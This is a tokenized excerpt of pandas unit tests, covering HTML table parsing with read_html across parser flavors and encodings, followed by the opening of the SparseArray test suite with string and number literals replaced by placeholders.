assert_framelist_equal ( res1 , res2 ) <EOL> def test_nyse_wsj_commas_table ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> df = self . read_html ( data , index_col = <NUM_LIT:0> , header = <NUM_LIT:0> , <EOL> attrs = { '<STR_LIT:class>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> columns = Index ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> nrows = <NUM_LIT:100> <EOL> self . assertEqual ( df . shape [ <NUM_LIT:0> ] , nrows ) <EOL> self . assertTrue ( df . columns . equals ( columns ) ) <EOL> @ slow <EOL> def test_banklist_header ( self ) : <EOL> from pandas . io . html import _remove_whitespace <EOL> def try_remove_ws ( x ) : <EOL> try : <EOL> return _remove_whitespace ( x ) <EOL> except AttributeError : <EOL> return x <EOL> df = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> ground_truth = read_csv ( os . path . join ( DATA_PATH , '<STR_LIT>' ) , <EOL> converters = { '<STR_LIT>' : Timestamp , <EOL> '<STR_LIT>' : Timestamp } ) <EOL> self . assertEqual ( df . shape , ground_truth . shape ) <EOL> old = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> new = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> dfnew = df . applymap ( try_remove_ws ) . replace ( old , new ) <EOL> gtnew = ground_truth . applymap ( try_remove_ws ) <EOL> converted = dfnew . _convert ( datetime = True , numeric = True ) <EOL> date_cols = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> converted [ date_cols ] = converted [ date_cols ] . _convert ( datetime = True , <EOL> coerce = True ) <EOL> tm . assert_frame_equal ( converted , gtnew ) <EOL> @ slow <EOL> def test_gold_canyon ( self ) : <EOL> gc = '<STR_LIT>' <EOL> with open ( self . banklist_data , '<STR_LIT:r>' ) as f : <EOL> raw_text = f . read ( ) <EOL> self . assertIn ( gc , raw_text ) <EOL> df = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> self . assertIn ( gc , df . to_string ( ) ) <EOL> def test_different_number_of_rows ( self ) : <EOL> expected = """<STR_LIT>""" <EOL> out = """<STR_LIT>""" <EOL> expected = self . read_html ( expected , index_col = <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> res = self . read_html ( out , index_col = <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> tm . assert_frame_equal ( expected , res ) <EOL> def test_parse_dates_list ( self ) : <EOL> df = DataFrame ( { '<STR_LIT:date>' : date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) } ) <EOL> expected = df . to_html ( ) <EOL> res = self . read_html ( expected , parse_dates = [ <NUM_LIT:1> ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> res = self . read_html ( expected , parse_dates = [ '<STR_LIT:date>' ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> def test_parse_dates_combine ( self ) : <EOL> raw_dates = Series ( date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) ) <EOL> df = DataFrame ( { '<STR_LIT:date>' : raw_dates . map ( lambda x : str ( x . date ( ) ) ) , <EOL> '<STR_LIT:time>' : raw_dates . map ( lambda x : str ( x . time ( ) ) ) } ) <EOL> res = self . read_html ( df . to_html ( ) , parse_dates = { '<STR_LIT>' : [ <NUM_LIT:1> , <NUM_LIT:2> ] } , <EOL> index_col = <NUM_LIT:1> ) <EOL> newdf = DataFrame ( { '<STR_LIT>' : raw_dates } ) <EOL> tm . assert_frame_equal ( newdf , res [ <NUM_LIT:0> ] ) <EOL> def test_computer_sales_page ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( CParserError , r"<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) : <EOL> self . read_html ( data , header = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> def test_wikipedia_states_table ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> assert os . path . isfile ( data ) , '<STR_LIT>' % data <EOL> assert os . path . getsize ( data ) , '<STR_LIT>' % data <EOL> result = self . read_html ( data , '<STR_LIT>' , header = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> nose . tools . assert_equal ( result [ '<STR_LIT>' ] . dtype , np . dtype ( '<STR_LIT>' ) ) <EOL> def test_bool_header_arg ( self ) : <EOL> for arg in [ True , False ] : <EOL> with tm . assertRaises ( TypeError ) : <EOL> read_html ( self . spam_data , header = arg ) <EOL> def _lang_enc ( filename ) : <EOL> return os . path . splitext ( os . path . basename ( filename ) ) [ <NUM_LIT:0> ] . split ( '<STR_LIT:_>' ) <EOL> class TestReadHtmlEncoding ( tm . TestCase ) : <EOL> files = glob . glob ( os . path . join ( DATA_PATH , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> flavor = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtmlEncoding , cls ) . setUpClass ( ) <EOL> _skip_if_none_of ( ( cls . flavor , '<STR_LIT>' ) ) <EOL> def read_html ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = self . flavor <EOL> return read_html ( * args , ** kwargs ) <EOL> def read_filename ( self , f , encoding ) : <EOL> return self . read_html ( f , encoding = encoding , index_col = <NUM_LIT:0> ) <EOL> def read_file_like ( self , f , encoding ) : <EOL> with open ( f , '<STR_LIT:rb>' ) as fobj : <EOL> return self . read_html ( BytesIO ( fobj . read ( ) ) , encoding = encoding , <EOL> index_col = <NUM_LIT:0> ) <EOL> def read_string ( self , f , encoding ) : <EOL> with open ( f , '<STR_LIT:rb>' ) as fobj : <EOL> return self . read_html ( fobj . read ( ) , encoding = encoding , index_col = <NUM_LIT:0> ) <EOL> def test_encode ( self ) : <EOL> assert self . files , '<STR_LIT>' <EOL> for f in self . files : <EOL> _ , encoding = _lang_enc ( f ) <EOL> try : <EOL> from_string = self . read_string ( f , encoding ) . pop ( ) <EOL> from_file_like = self . read_file_like ( f , encoding ) . pop ( ) <EOL> from_filename = self . read_filename ( f , encoding ) . pop ( ) <EOL> tm . assert_frame_equal ( from_string , from_file_like ) <EOL> tm . assert_frame_equal ( from_string , from_filename ) <EOL> except Exception : <EOL> if is_platform_windows ( ) : <EOL> if '<STR_LIT>' in encoding or '<STR_LIT>' in encoding : <EOL> continue <EOL> raise <EOL> class TestReadHtmlEncodingLxml ( TestReadHtmlEncoding ) : <EOL> flavor = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtmlEncodingLxml , cls ) . setUpClass ( ) <EOL> _skip_if_no ( cls . flavor ) <EOL> class TestReadHtmlLxml ( tm . TestCase , ReadHtmlMixin ) : <EOL> flavor = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtmlLxml , cls ) . setUpClass ( ) <EOL> _skip_if_no ( '<STR_LIT>' ) <EOL> def test_data_fail ( self ) : <EOL> from lxml . etree import XMLSyntaxError <EOL> spam_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> banklist_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> with tm . assertRaises ( XMLSyntaxError ) : <EOL> self . read_html ( spam_data ) <EOL> with tm . assertRaises ( XMLSyntaxError ) : <EOL> self . read_html ( banklist_data ) <EOL> def test_works_on_valid_markup ( self ) : <EOL> filename = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs = self . read_html ( filename , index_col = <NUM_LIT:0> ) <EOL> tm . assertIsInstance ( dfs , list ) <EOL> tm . assertIsInstance ( dfs [ <NUM_LIT:0> ] , DataFrame ) <EOL> @ slow <EOL> def test_fallback_success ( self ) : <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> banklist_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> self . read_html ( banklist_data , '<STR_LIT>' , flavor = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_parse_dates_list ( self ) : <EOL> df = DataFrame ( { '<STR_LIT:date>' : date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) } ) <EOL> expected = df . to_html ( ) <EOL> res = self . read_html ( expected , parse_dates = [ <NUM_LIT:1> ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> res = self . read_html ( expected , parse_dates = [ '<STR_LIT:date>' ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> def test_parse_dates_combine ( self ) : <EOL> raw_dates = Series ( date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) ) <EOL> df = DataFrame ( { '<STR_LIT:date>' : raw_dates . map ( lambda x : str ( x . date ( ) ) ) , <EOL> '<STR_LIT:time>' : raw_dates . map ( lambda x : str ( x . time ( ) ) ) } ) <EOL> res = self . read_html ( df . to_html ( ) , parse_dates = { '<STR_LIT>' : [ <NUM_LIT:1> , <NUM_LIT:2> ] } , <EOL> index_col = <NUM_LIT:1> ) <EOL> newdf = DataFrame ( { '<STR_LIT>' : raw_dates } ) <EOL> tm . assert_frame_equal ( newdf , res [ <NUM_LIT:0> ] ) <EOL> def test_computer_sales_page ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> self . read_html ( data , header = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> def test_invalid_flavor ( ) : <EOL> url = '<STR_LIT>' <EOL> with tm . assertRaises ( ValueError ) : <EOL> read_html ( url , '<STR_LIT>' , flavor = '<STR_LIT>' ) <EOL> def get_elements_from_file ( url , element = '<STR_LIT>' ) : <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> url = file_path_to_url ( url ) <EOL> from bs4 import BeautifulSoup <EOL> with urlopen ( url ) as f : <EOL> soup = BeautifulSoup ( f , features = '<STR_LIT>' ) <EOL> return soup . find_all ( element ) <EOL> @ slow <EOL> def test_bs4_finds_tables ( ) : <EOL> filepath = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' ) <EOL> assert get_elements_from_file ( filepath , '<STR_LIT>' ) <EOL> def get_lxml_elements ( url , element ) : <EOL> _skip_if_no ( '<STR_LIT>' ) <EOL> from lxml . html import parse <EOL> doc = parse ( url ) <EOL> return doc . xpath ( '<STR_LIT>' . format ( element ) ) <EOL> @ slow <EOL> def test_lxml_finds_tables ( ) : <EOL> filepath = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> assert get_lxml_elements ( filepath , '<STR_LIT>' ) <EOL> @ slow <EOL> def test_lxml_finds_tbody ( ) : <EOL> filepath = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> assert get_lxml_elements ( filepath , '<STR_LIT>' ) <EOL> def test_same_ordering ( ) : <EOL> _skip_if_none_of ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> filename = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs_lxml = read_html ( filename , index_col = <NUM_LIT:0> , flavor = [ '<STR_LIT>' ] ) <EOL> dfs_bs4 = read_html ( filename , index_col = <NUM_LIT:0> , flavor = [ '<STR_LIT>' ] ) <EOL> assert_framelist_equal ( dfs_lxml , dfs_bs4 ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> nose . runmodule ( argv = [ __file__ , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> exit = False ) </s>
<s> from pandas . compat import range <EOL> import re <EOL> import operator <EOL> import warnings <EOL> from numpy import nan <EOL> import numpy as np <EOL> from pandas import _np_version_under1p8 <EOL> from pandas . sparse . api import SparseArray <EOL> from pandas . _sparse import IntIndex <EOL> from pandas . util . testing import assert_almost_equal , assertRaisesRegexp <EOL> import pandas . util . testing as tm <EOL> class TestSparseArray ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def setUp ( self ) : <EOL> self . arr_data = np . array ( [ nan , nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , nan , <NUM_LIT:4> , <NUM_LIT:5> , nan , <NUM_LIT:6> ] ) <EOL> self . arr = SparseArray ( self . arr_data ) <EOL> self . zarr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:6> ] , fill_value = <NUM_LIT:0> ) <EOL> def test_constructor_dtype ( self ) : <EOL> arr = SparseArray ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , np . nan ] ) <EOL> self . assertEqual ( arr . dtype , np . float64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> self . assertEqual ( arr . dtype , np . float64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> , dtype = np . int64 ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , dtype = None ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> , dtype = None ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> def test_constructor_spindex_dtype ( self ) : <EOL> arr = SparseArray ( data = [ <NUM_LIT:1> , <NUM_LIT:2> ] , sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> tm . assert_sp_array_equal ( arr , SparseArray ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , np . nan ] ) ) <EOL> self . assertEqual ( arr . dtype , np . float64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> dtype = np . int64 ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = np . int64 ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:1> , <NUM_LIT:2> ] , sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) , <EOL> fill_value = <NUM_LIT:0> , dtype = np . int64 ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> , dtype = np . int64 ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> dtype = None ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = None ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = <NUM_LIT:1> , <EOL> sparse_index = IntIndex ( <NUM_LIT:1> , [ <NUM_LIT:0> ] ) , <EOL> dtype = None ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> ] , dtype = None ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:1> , <NUM_LIT:2> ] , sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) , <EOL> fill_value = <NUM_LIT:0> , dtype = None ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> , dtype = None ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> def test_get_item ( self ) : <EOL> self . assertTrue ( np . isnan ( self . arr [ <NUM_LIT:1> ] ) ) <EOL> self . assertEqual ( self . arr [ <NUM_LIT:2> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . arr [ <NUM_LIT:7> ] , <NUM_LIT:5> ) <EOL> self . assertEqual ( self . zarr [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . zarr [ <NUM_LIT:2> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . zarr [ <NUM_LIT:7> ] , <NUM_LIT:5> ) <EOL> errmsg = re . compile ( "<STR_LIT>" ) <EOL> assertRaisesRegexp ( IndexError , errmsg , lambda : self . arr [ <NUM_LIT:11> ] ) <EOL> assertRaisesRegexp ( IndexError , errmsg , lambda : self . arr [ - <NUM_LIT:11> ] ) <EOL> self . assertEqual ( self . arr [ - <NUM_LIT:1> ] , self . arr [ len ( self . arr ) - <NUM_LIT:1> ] ) <EOL> def test_take ( self ) : <EOL> self . assertTrue ( np . isnan ( self . arr . take ( <NUM_LIT:0> ) ) ) <EOL> self . assertTrue ( np . isscalar ( self . arr . take ( <NUM_LIT:2> ) ) ) <EOL> if not _np_version_under1p8 : <EOL> self . assertEqual ( self . arr . take ( <NUM_LIT:2> ) , np . take ( self . arr_data , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( self . arr . take ( <NUM_LIT:6> ) , np . take ( self . arr_data , <NUM_LIT:6> ) ) <EOL> exp = SparseArray ( np . take ( self . arr_data , [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , exp ) <EOL> exp = SparseArray ( np . take ( self . arr_data , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) , exp ) <EOL> def test_take_fill_value ( self ) : <EOL> data = np . array ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] ) <EOL> sparse = SparseArray ( data , fill_value = <NUM_LIT:0> ) <EOL> exp = SparseArray ( np . take ( data , [ <NUM_LIT:0> ] ) , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( sparse . take ( [ <NUM_LIT:0> ] ) , exp ) <EOL> exp = SparseArray ( np . take ( data , [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( sparse . take ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , exp ) <EOL> def test_take_negative ( self ) : <EOL> exp = SparseArray ( np . take ( self . arr_data , [ - <NUM_LIT:1> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ - <NUM_LIT:1> ] ) , exp ) <EOL> exp = SparseArray ( np . take ( self . arr_data , [ - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:2> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:2> ] ) , exp ) <EOL> def test_bad_take ( self ) : <EOL> assertRaisesRegexp ( IndexError , "<STR_LIT>" , lambda : self . arr . take ( <NUM_LIT:11> ) ) <EOL> self . assertRaises ( IndexError , lambda : self . arr . take ( - <NUM_LIT:11> ) ) <EOL> def test_take_filling ( self ) : <EOL> sparse = SparseArray ( [ np . nan , np . nan , <NUM_LIT:1> , np . nan , <NUM_LIT:4> ] ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) <EOL> expected = SparseArray ( [ np . nan , np . nan , <NUM_LIT:4> ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , fill_value = True ) <EOL> expected = SparseArray ( [ np . nan , np . nan , np . nan ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , <EOL> allow_fill = False , fill_value = True ) <EOL> expected = SparseArray ( [ np . nan , np . nan , <NUM_LIT:4> ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:2> ] ) , fill_value = True ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:5> ] ) , fill_value = True ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , - <NUM_LIT:6> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) , fill_value = True ) <EOL> def test_take_filling_fill_value ( self ) : <EOL> sparse = SparseArray ( [ np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) <EOL> expected = SparseArray ( [ <NUM_LIT:0> , np . nan , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , fill_value = True ) <EOL> expected = SparseArray ( [ <NUM_LIT:0> , np . nan , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , <EOL> allow_fill = False , fill_value = True ) <EOL> expected = SparseArray ( [ <NUM_LIT:0> , np . nan , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:2> ] ) , fill_value = True ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:5> ] ) , fill_value = True ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , - <NUM_LIT:6> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) , fill_value = True ) <EOL> def test_take_filling_all_nan ( self ) : <EOL> sparse = SparseArray ( [ np . nan , np . nan , np . nan , np . nan , np . nan ] ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) <EOL> expected = SparseArray ( [ np . nan , np . nan , np . nan ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , fill_value = True ) <EOL> expected = SparseArray ( [ np . nan , np . nan , np . nan ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , - <NUM_LIT:6> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) , fill_value = True ) <EOL> def test_set_item ( self ) : <EOL> def setitem ( ) : <EOL> self . arr [ <NUM_LIT:5> ] = <NUM_LIT:3> <EOL> def setslice ( ) : <EOL> self . arr [ <NUM_LIT:1> : <NUM_LIT:5> ] = <NUM_LIT:2> <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , setitem ) <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , setslice ) <EOL> def test_constructor_from_too_large_array ( self ) : <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> SparseArray , np . arange ( <NUM_LIT:10> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) ) <EOL> def test_constructor_from_sparse ( self ) : <EOL> res = SparseArray ( self . zarr ) <EOL> self . assertEqual ( res . fill_value , <NUM_LIT:0> ) <EOL> assert_almost_equal ( res . sp_values , self . zarr . sp_values ) <EOL> def test_constructor_copy ( self ) : <EOL> cp = SparseArray ( self . arr , copy = True ) <EOL> cp . sp_values [ : <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> self . assertFalse ( ( self . arr . sp_values [ : <NUM_LIT:3> ] == <NUM_LIT:0> ) . any ( ) ) <EOL> not_copy = SparseArray ( self . arr ) <EOL> not_copy . sp_values [ : <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> self . assertTrue ( ( self . arr . sp_values [ : <NUM_LIT:3> ] == <NUM_LIT:0> ) . all ( ) ) <EOL> def test_constructor_bool ( self ) : <EOL> data = np . array ( [ False , False , True , True , False , False ] ) <EOL> arr = SparseArray ( data , fill_value = False , dtype = bool ) <EOL> self . assertEqual ( arr . dtype , bool ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . array ( [ True , True ] ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . asarray ( arr ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_index . indices , np . array ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> for dense in [ arr . to_dense ( ) , arr . values ] : <EOL> self . assertEqual ( dense . dtype , bool ) <EOL> tm . assert_numpy_array_equal ( dense , data ) <EOL> def test_constructor_bool_fill_value ( self ) : <EOL> arr = SparseArray ( [ True , False , True ] , dtype = None ) <EOL> self . assertEqual ( arr . dtype , np . bool ) <EOL> self . assertFalse 